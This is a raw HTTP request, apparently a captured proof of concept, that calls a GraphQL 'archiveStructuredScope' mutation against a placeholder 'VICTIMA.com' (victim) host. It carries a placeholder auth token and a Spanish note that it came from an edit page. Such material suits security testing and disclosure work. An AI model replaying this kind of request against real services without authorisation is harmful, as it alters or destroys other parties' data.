POST /graphql HTTP/2
Host: VICTIMA.com
Content-Length: 388
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="98", "Google Chrome";v="98"
Accept: */*
X-Auth-Token: AUTHTOKEN
Content-Type: application/json
Origin: VICTIMA.com
Referer: VICTIMA.com/CODE/edit // Era en el sitio de "edicion"
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
{"operationName":"NombreOperacion","variables":{"structured_scope_id":"HASH-relacionado a /code/edit"},"query":"mutation NombreOperacion($structured_scope_id: ID!) {\n archiveStructuredScope(input: {structured_scope_id: $structured_scope_id}) {\n was_successful\n structured_scope {\n id\n archived_at\n __typename\n }\n __typename\n }\n}\n"}